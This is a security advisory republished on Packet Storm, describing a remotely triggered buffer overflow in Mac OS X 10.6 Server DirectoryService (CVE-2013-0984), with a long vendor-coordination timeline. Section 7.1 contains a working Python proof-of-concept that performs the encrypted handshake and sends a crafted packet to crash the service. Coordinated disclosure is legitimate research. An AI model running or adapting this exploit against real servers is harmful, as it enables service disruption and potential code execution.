exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Mac OSX Server DirectoryService Buffer Overflow

Mac OSX Server DirectoryService Buffer Overflow
Posted Jun 5, 2013
Authored by Core Security Technologies | Site coresecurity.com

Core Security Technologies Advisory - A memory corruption vulnerability was found in Mac OSX Directory Service. By sending a maliciously crafted message, a remote attacker could cause the directory server to terminate or execute arbitrary code with system privileges. The issue existed in the directory server's handling of messages from the network.

tags | exploit, remote, arbitrary
systems | apple
advisories | CVE-2013-0984
SHA-256 | 0af07c9bc743ae24f0e1c9852c676d23a4a2bef08aa16b852625d54038fce987

Mac OSX Server DirectoryService Buffer Overflow

Change Mirror Download
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Mac OSX Server DirectoryService buffer overflow


1. *Advisory Information*

Title: Mac OSX Server DirectoryService buffer overflow
Advisory ID: CORE-2013-0103
Advisory URL:
http://www.coresecurity.com/advisories/mac-osx-server-directoryservice-buffer-overflow
Date published: 2013-06-04
Date of last update: 2013-06-04
Vendors contacted: Apple
Release mode: Coordinated release


2. *Vulnerability Information*

Class: Buffer overflow [CWE-119]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-0984


3. *Vulnerability Description*

A memory corruption vulnerability was found in Mac OSX Directory
Service. By sending a maliciously crafted message, a remote attacker
could cause the directory server to terminate or execute arbitrary code
with system privileges. The issue existed in the directory server's
handling of messages from the network.


4. *Vulnerable Packages*

. Mac OS X 10.6.8 Server (x86_64)
. Mac OS X 10.6.7 Server (x86_64)
. Mac OS X 10.6.6 Server (x86_64)
. Mac OS X 10.6.5 Server (x86_64)
. Mac OS X 10.6.4 Server (x86_64)
. Mac OS X 10.6.3 Server (x86_64)
. Mac OS X 10.6.2 Server (x86_64)
. Mac OS X 10.6.1 Server (x86_64)
. Mac OS X 10.6.0 Server (x86_64)
. Other versions are probably affected too, but they were not checked.


5. *Vendor Information, Solutions and Workarounds*

. Apple security updates are available via the Software Update
mechanism: http://support.apple.com/kb/HT1338.
. Apple security updates are also available for manual download via:
http://www.apple.com/support/downloads.
. For further information regarding this issue visit:
http://support.apple.com/kb/HT1222.
. Vendor also notifies that this issue does not affect OS X Lion or
OS X Mountain Lion systems.


6. *Credits*

This vulnerability was discovered and researched by Nicolas Economou.
The publication of this advisory was coordinated by Fernando Miranda
from Core Advisories Team.


7. *Technical Description / Proof of Concept Code*

The bug is located in the function 'DSTCPEndpoint::AllocFromProxyStruct'
from 'DSTCPEndpoint.cpp'[1]. An attacker can control both the value of
'inProxyDataMsg->fDataSize' and the data that will be copied. Thus, by
sending a huge amount of data and a small buffer size, the service will
crash trying to access an unmapped memory block.


7.1. *Proof of Concept*

Before running the PoC, make sure you meet the following prerequisites:

1. The PyCrypto toolkit [2] has to be installed.
2. The IP address and port (hardcoded at the end of the file) have to
point to your server.
3. The PoC was tested against a Mac OSX Server 10.6.8 with the last
security patch installed [3].

/-----
from Crypto.Cipher import AES
import socket
import struct
import time

def send_packet(sock, data):
packet = ""
packet += "DSPX"
packet += struct.pack(">I", len(data))
packet += data
sock.send(packet)


def get_crypted_data(shared_key, data):
cipher = AES.new(shared_key, AES.MODE_CBC, "\x00" * 16)
crypted_data = cipher.encrypt(data)
return crypted_data


def attack(ip, port):
try:
p = socket.socket()
p.connect((ip, port))
except Exception, e:
print e
return
data = ""
data += "DHN2"
data += "\x00" * 63 + "\x02" # Key that generates a DERIVED KEY,
identical to the one received.
# Packet 1
print ("\nSending my public key ...")
send_packet(p, data)
resp = p.recv(65536)
# Key sent by server.
key_sent = resp[8: len(resp) - 1]
server_key = ""
# Flip the number.
for i in range(len(key_sent) - 1, -1, -1):
server_key += key_sent[i]
# String to (a huge) number conversion.
big_number = ""
for c in server_key:
big_number += "%.2x" % ord(c)
big_number = int(big_number, 16)
prime = 2 ** 128
# Obtaining the SHARED KEY (To be use for AES encryption).
derived_key = pow(big_number, 1, prime)
magic_number = derived_key
derived_key_string = ""
# Transform key into a string.
while magic_number != 0:
resto = magic_number % 256
magic_number /= 256
derived_key_string += struct.pack("B", resto)[0]
print "shared key: %s" % repr(derived_key_string)
# Handshake.
print "Sending the Handshaking"
data = "A" * 4 + ("\x0c" * 12)
crypted_data = get_crypted_data(derived_key_string, data)
send_packet(p, crypted_data)
resp = p.recv(65536)
data = ""
data += "A" * 0x1b
data += "\x02"
data += struct.pack("<I", 0x10000000) # Evil value.
data += struct.pack("<I", 0x100) # Value to be used by
the last patched version.
data += "A" * ( 0x34 - len(data) )
data += struct.pack(">I", 0x1172 + 1) # Operation code.
data += struct.pack(">I", 0x99999999)
data += struct.pack(">I", 0x80808080)
data += struct.pack(">I", 0x81818181)
data += struct.pack(">I", 0x66666666)
data += "B" * (0xe0 - len(
data)) # Bypass in previous Mac OSX versions ( Integer
underflow -> ( ( 0xe0 + 0x10 ) - 0x100 )
data += "\x00" * 16
crypted_data = get_crypted_data(derived_key_string, data)
# TRIGGER
print ( "Sending the evil packet" )
send_packet(p, crypted_data)
p.settimeout(10)
try:
p.recv(65536)
except Exception, e:
print e
p.close()
try:
print ( "\nwaiting 10 seconds for check ..." )
time.sleep(10)
p = socket.socket()
p.settimeout(10)
p.connect(( ip, port ))
except Exception:
print ( "\nThe attack was successful !\n" )
return
print ( "\nThe attack wasn't successful\n" )
return


ip = "192.168.100.1"
port = 625
attack(ip, port)

-----/


8. *Report Timeline*

. 2013-01-09:
Core Security Technologies notifies Apple Product Security of the
vulnerability and sends technical details and a PoC to reproduce the
issue. Publication date is set for Feb 19th, 2013.

. 2013-01-10:
Apple Product Security acknowledges reception of the advisory (id
250731893 assigned).

. 2013-02-01:
Core asks Apple Product Security if they were able to reproduce the
issue and requests a status update.

. 2013-02-05:
The Apple Product Security team notifies that they were able to
reproduce the issue and asks to delay the advisory publication until
they were able to ship a security update.

. 2013-02-19:
First release date missed.

. 2013-02-25:
Core notifies that release dates can be re-scheduled based on concrete
and detailed information about vendor plans to produce a fix, but Core
has not received that information from Apple yet.

. 2013-02-28:
Vendor notifies that they are still working on fixing the issue and the
current best estimate for releasing a patch is late April.

. 2013-03-05:
Core re-schedules the advisory publication for April 30th and asks for
detailed technical information.

. 2013-03-08:
Vendor notifies that the issue affects Mac OS X Snow Leopard Server
only. Code execution may theoretically be possible but Apple Product
Security team was not able to do so.

. 2013-04-22:
Core asks for a status update.

. 2013-04-24:
Vendor estimates that they will address this issue in early May.

. 2013-04-30:
Second release date missed.

. 2013-04-30:
Core notifies that the second release date was missed and that the
advisory publication can be re-scheduled if Apple provides enough
feedback and technical information for justifying that decision: 1. For
what reasons Apple was not able to release the update at the end of
April as planned? 2. What is the status of next security update? 3. What
is the new tentative release date? 4. Is a patch available for test it?

. 2013-05-02:
Vendor notifies that the reported issue is addressed in the upcoming
security update for Mac OS X Snow Leopard, targeted for mid-May.

. 2013-05-02:
Core re-schedules the advisory publication for May 14th.

. 2013-05-02:
Vendor sends an invitation to join in to the Apple Software Customer
Seeding program [4] for pre-release access to builds of this security
update.

. 2013-05-07:
Third release date missed.

. 2013-05-13:
Core asks if the tentative release date of Mid May still stands.

. 2013-05-14:
Fourth release date missed.

. 2013-05-15:
Vendor notifies that the upcoming update addresses a considerable number
of security issues and the release has to be postponed. Vendor notifies
they will communicate a tentative release days in the next few days.

. 2013-05-27:
Core asks for a release date and notifies that the advisory was
re-scheduled for Jun 6th; this date should be considered final unless
vendor provides a clear timeline to justify keep delaying the release.

. 2013-05-29:
Vendor notifies that they are still waiting a confirmation from CORE
Security that the update they seeded [2013-05-02] addresses the reported
issue.

. 2013-05-29:
Core notifies that being part of Apple beta test program was never
requested and asks for a CVE number and a confirmed release date.

. 2013-05-30:
Vendor notifies that the invitation to the Apple Software Customer
Seeding [4] was sent because Core requested a patch for testing on
[2013-04-30]. Vendor asks if Core has already completed the patch
testing process.

. 2013-05-30:
Core notifies that it was not possible to download the patch from the
location provided by Apple and no more time nor resources can be spent
on this case. Core also notified that this case was reported 5 months
ago and 4 release dates were missed: Feb 19th, late April, early May and
mid-May. Additionally, in the last weeks Core asked for a release date
several times but did not receive any answer. For those reasons, Core
confirms the release date of Jun 6th.

. 2013-05-31:
Vendor notifies that the security update is on track for releasing next
week and assigns CVE-2013-0984 for this issue. Vendor changes the
vulnerability impact from DoS to code-execution.

. 2013-06-04:
Vendor notifies that the security update was released.

. 2013-06-04:
Advisory CORE-2013-0103 released.


9. *References*

[1]
http://opensource.apple.com/source/DirectoryService/DirectoryService-621/Proxy/DSTCPEndpoint.cpp
[2] https://www.dlitz.net/software/pycrypto/
[3] http://support.apple.com/kb/HT5501 - DirectoryService
[4] https://appleseed.apple.com


10. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.


11. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.


12. *Disclaimer*

The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close